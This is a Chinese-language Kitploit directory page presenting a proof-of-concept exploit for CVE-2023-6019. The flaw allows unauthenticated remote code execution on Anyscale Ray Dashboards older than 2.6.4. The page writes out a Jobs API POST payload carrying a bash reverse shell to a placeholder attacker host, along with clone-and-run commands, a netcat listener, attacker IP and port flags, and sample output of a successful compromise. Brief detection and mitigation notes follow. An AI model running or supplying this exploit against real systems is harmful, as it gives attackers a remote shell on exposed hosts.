Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-6019 — 针对 CVE-2023-6019 的 PoC 漏洞利用,通过 Jobs API 在 Anyscale Ray Dashboard 中实现未认证的远程代码执行。在易受攻击的 Ray 实例(< 2.6.4)上提供反向 shell。 | Kitploit
工具/GitHubGitHub/joaquinrrr/cve-2023-6019
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

针对 CVE-2023-6019 的 PoC 漏洞利用,通过 Jobs API 在 Anyscale Ray Dashboard 中实现未认证的远程代码执行。在易受攻击的 Ray 实例(< 2.6.4)上提供反向 shell。

查看仓库
6112个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-6019 - Anyscale Ray 仪表盘未授权远程代码执行

CVE-2023-6019 的 PoC 利用程序 — 通过未经认证的 Ray 仪表盘 Jobs API 实现远程代码执行。
由 oguiii 制作


描述

Anyscale Ray 是一个用于分布式 ML/AI 工作负载的开源框架。版本 早于 2.6.4 通过 Ray 仪表盘(默认端口 8265)暴露了一个 Jobs 提交 API,没有任何身份验证,允许未认证的攻击者提交任意作业并在主机上实现远程代码执行。

  • CVE: CVE-2023-6019
  • 严重性: 严重 (CVSS 9.8)
  • 受影响版本: Ray < 2.6.4
  • 修复版本: Ray 2.6.4
  • 攻击向量: 网络 (未认证的 HTTP 请求)

工作原理

/api/jobs/ 端点接受一个 JSON 负载,其中包含一个 entrypoint 字段,该字段会被 Ray 工作进程作为 shell 命令执行 — 无需凭证。

root@kitploit:~
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

用法

root@kitploit:~
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>

参数

示例

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 运行利用程序
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

预期输出

root@kitploit:~
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version     : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019

[*] Target        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...

[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Make sure your listener is ready:
    nc -lvnp 4444

检测

在 HTTP 日志或网络流量中查找针对端口 8265 上 /api/jobs/ 的意外 POST 请求。


缓解措施

  • 升级到 Ray >= 2.6.4
  • 通过防火墙规则限制对 Ray 仪表盘端口 (8265) 的访问
  • 不要将 Ray 仪表盘暴露在公共网络中

参考

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

免责声明

此工具仅用于授权的渗透测试和教育目的。
作者不对因使用此工具而造成的任何滥用或损害负责。
始终在测试前获得适当的书面授权。

下载工具
标志描述默认值
-t目标 IP 或主机名必填
-pRay 仪表盘端口8265
-l攻击者 IP (反弹 shell)必填
-lp攻击者端口 (反弹 shell)必填